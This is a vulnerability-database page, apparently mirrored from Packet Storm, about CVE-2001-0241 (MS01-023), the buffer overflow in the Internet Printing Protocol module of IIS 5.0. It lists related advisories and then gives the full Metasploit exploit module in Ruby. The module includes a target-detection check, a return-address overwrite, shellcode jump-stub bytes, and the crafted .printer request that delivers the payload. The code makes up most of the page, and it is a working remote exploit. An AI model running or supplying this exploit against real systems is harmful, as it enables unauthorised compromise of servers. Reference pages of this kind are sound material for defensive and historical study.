Microsoft IIS 5.0 Printer Host Header Overflow

🗓️ 30 Oct 2009 00:00:00Reported by H D MooreType

packetstorm🔗 packetstormsecurity.com👁 51 Views

Microsoft IIS 5.0 Printer Host Buffer Overflo

Reporter	Title	Published	Views	Family All 21
Circl	CVE-2001-0241	30 Apr 201000:00	–	circl
Check Point Advisories	Microsoft IIS 5.0 ISAPI Internet Printing Protocol Extension Buffer Overflow (CVE-2001-0241)	27 May 201000:00	–	checkpoint_advisories
Check Point Advisories	Microsoft IIS 5.0 ISAPI Internet Printing Protocol Extension Buffer Overflow - Ver2 (CVE-2001-0241)	26 Mar 201500:00	–	checkpoint_advisories
Check Point Advisories	Microsoft IIS 5.0 ISAPI Internet Printing Protocol Extension Buffer Overflow - ver 2 (CVE-2001-0241)	30 Jun 201600:00	–	checkpoint_advisories
CVE	CVE-2001-0241	18 Sep 200104:00	–	cve
Cvelist	CVE-2001-0241	18 Sep 200104:00	–	cvelist
Exploit DB	Microsoft IIS 5.0 - Printer Host Header Overflow (MS01-023) (Metasploit)	30 Apr 201000:00	–	exploitdb
canvas	Immunity Canvas: IIS5ASP	27 Jun 200100:00	–	canvas
canvas	Immunity Canvas: MS01_023	27 Jun 200104:00	–	canvas
Tenable Nessus	MS01-023: Microsoft IIS 5.0 Malformed HTTP Printer Request Header Remote Buffer Overflow (953155) (uncredentialed check)	1 May 200100:00	–	nessus

`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::Tcp  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'Microsoft IIS 5.0 Printer Host Header Overflow',  
'Description' => %q{  
This exploits a buffer overflow in the request processor of  
the Internet Printing Protocol ISAPI module in IIS. This  
module works against Windows 2000 service pack 0 and 1. If  
the service stops responding after a successful compromise,  
run the exploit a couple more times to completely kill the  
hung process.  
  
},  
'Author' => [ 'hdm' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision$',  
'References' =>  
[  
[ 'CVE', '2001-0241'],  
[ 'OSVDB', '3323'],  
[ 'BID', '2674'],  
[ 'MSB', 'MS01-023'],  
[ 'URL', 'http://seclists.org/lists/bugtraq/2001/May/0005.html'],  
  
],  
'Privileged' => false,  
'Payload' =>  
{  
'Space' => 900,  
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",  
'StackAdjustment' => -3500,  
  
},  
'Targets' =>   
[  
[   
'Windows 2000 English SP0-SP1',   
{  
'Platform' => 'win',  
'Ret' => 0x732c45f3,  
},  
],  
],  
'Platform' => 'win',  
'DisclosureDate' => 'May 1 2001',  
'DefaultTarget' => 0))  
  
register_options(  
[  
Opt::RPORT(80)  
], self.class)   
end  
  
  
def check  
connect  
sock.put("GET /NULL.printer HTTP/1.0\r\n\r\n")  
resp = sock.get_once  
disconnect  
  
if !(resp and resp =~ /Error in web printer/)  
return Exploit::CheckCode::Safe  
end  
  
connect  
sock.put("GET /NULL.printer HTTP/1.0\r\nHost: #{"X"*257}\r\n\r\n")  
resp = sock.get_once  
disconnect  
  
if (resp and resp =~ /locked out/)   
print_status("The IUSER account is locked out, we can't check")  
return Exploit::CheckCode::Detected  
end  
  
if (resp and resp.index("HTTP/1.1 500") >= 0)  
return Exploit::CheckCode::Vulnerable  
end  
  
return Exploit::CheckCode::Safe  
end  
  
def exploit  
connect  
  
buf = make_nops(280)  
buf[268, 4] = [target.ret].pack('V')  
  
# payload is at: [ebx + 96] + 256 + 64  
buf << "\x8b\x4b\x60" # mov ecx, [ebx + 96]  
buf << "\x80\xc1\x40" # add cl, 64  
buf << "\x80\xc5\x01" # add ch, 1  
buf << "\xff\xe1" # jmp ecx   
  
sock.put("GET http://#{buf}/NULL.printer?#{payload.encoded} HTTP/1.0\r\n\r\n")  
  
handler  
disconnect  
end  
  
end  
`

30 Oct 2009 00:00Current

0.5Low risk

Vulners AI Score0.5

EPSS0.87032